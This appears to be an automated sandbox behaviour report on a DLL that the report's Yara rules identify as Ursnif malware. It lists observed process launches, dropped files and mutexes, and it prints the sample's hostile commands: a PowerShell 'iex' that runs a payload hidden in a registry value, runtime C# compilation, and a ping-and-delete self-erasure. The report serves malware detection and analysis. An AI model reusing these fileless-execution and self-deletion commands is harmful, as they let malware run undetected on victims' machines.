Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211006

Jump to behavior

Creates temporary files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dbrdif.tbr.ps1

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winDLL@42/36@6/2

Reads ini files

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Contains functionality to enum processes or threads

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00F311B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,

0_2_00F311B8

Runs a DLL by calling functions

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin

Creates mutexes

Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{3AEAFF9F-51F4-7CA1-AB0E-15700F2219A4}
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{420C970D-B9DE-C4F8-5396-FD38372A81EC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7E32BD42-C5B7-60C6-3F92-C994E3E60D08}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{A257D023-99F2-243B-33F6-DD98178A614C}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{DAAB2CA3-7189-1CF4-CBAE-35102FC23944}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01

Reads the hosts file

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Reads internet explorer settings

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found GUI installer (many successful clicks)

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2u2mgtylJy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: 2u2mgtylJy.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: 2u2mgtylJy.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source:	Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll

PE file contains a valid data directory to section mapping

Source: 2u2mgtylJy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2u2mgtylJy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2u2mgtylJy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2u2mgtylJy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2u2mgtylJy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F37AB0 push ecx; ret		0_2_00F37AB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00F37E1F push ecx; ret		0_2_00F37E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E7E1F push ecx; ret		3_2_032E7E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_032E7AB0 push ecx; ret		3_2_032E7AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B7E1F push ecx; ret		6_2_031B7E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_031B7AB0 push ecx; ret		6_2_031B7AB9
Source: C:\Windows\System32\control.exe	Code function: 31_2_00A0B1B5 push 3B000001h; retf		31_2_00A0B1BA

PE file contains an invalid checksum

Source: jdlmh2q4.dll.18.dr	Static PE information: real checksum: 0x0 should be: 0x1012
Source: yg5i0oy3.dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x10739
Source: 2u2mgtylJy.dll	Static PE information: real checksum: 0x75958 should be: 0x72222
Source: w34iw342.dll.20.dr	Static PE information: real checksum: 0x0 should be: 0xca3f
Source: 4z2qptpk.dll.33.dr	Static PE information: real checksum: 0x0 should be: 0xa128

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jdlmh2q4.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\w34iw342.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\yg5i0oy3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4z2qptpk.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\explorer.exe	Process created: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
